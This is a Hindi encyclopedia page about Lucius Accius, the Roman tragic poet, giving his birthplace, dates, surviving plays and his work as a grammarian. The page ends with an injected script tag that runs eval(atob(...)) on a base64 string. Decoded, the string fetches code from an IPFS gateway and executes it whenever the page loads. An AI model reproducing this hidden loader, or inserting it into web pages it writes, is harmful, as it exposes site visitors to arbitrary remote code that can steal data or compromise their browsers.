आक्कियुस लुकियुस

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

आक्कियुस (अथवा अत्तियुस्‌) लुकियुस्‌ लातीनी भाषा का दु:खांत नाटकों का रचयिता कवि। इसका जन्म उंब्रिया के पिसौरूम नामक स्थान पर हुआ था। इसका समय ई.पू. 170 से ई.पू. 85 तक है। युवावस्था में यह रोम नगर में आकर बस गया था और ई.पू.140 में दु:खांत नाटकों (ट्रेजेडी) का विख्यात लेखक माना जाने लगा। इसके 45 नाटकों के नाम और इसकी रचनाओं की लगभग 700 पंक्तियाँ इस समय उपलब्ध हैं। अपने नाटकों को इसने यूनानी नाटकों के आदर्शों के अनुसार लिखा था। नाटकों के अतिरिक्त इसने गद्य और पद्य में और भी रचनाएँ प्रस्तुत की थीं जिनमें यूनानी और लातीनी साहित्य का इतिहास भी था। यह लातीनी भाषा का प्रथम महान्‌ वैयाकरण भी था।[1]



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. हिन्दी विश्वकोश, खण्ड 1 |प्रकाशक: नागरी प्रचारिणी सभा, वाराणसी |संकलन: भारत डिस्कवरी पुस्तकालय |पृष्ठ संख्या: 344 |

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>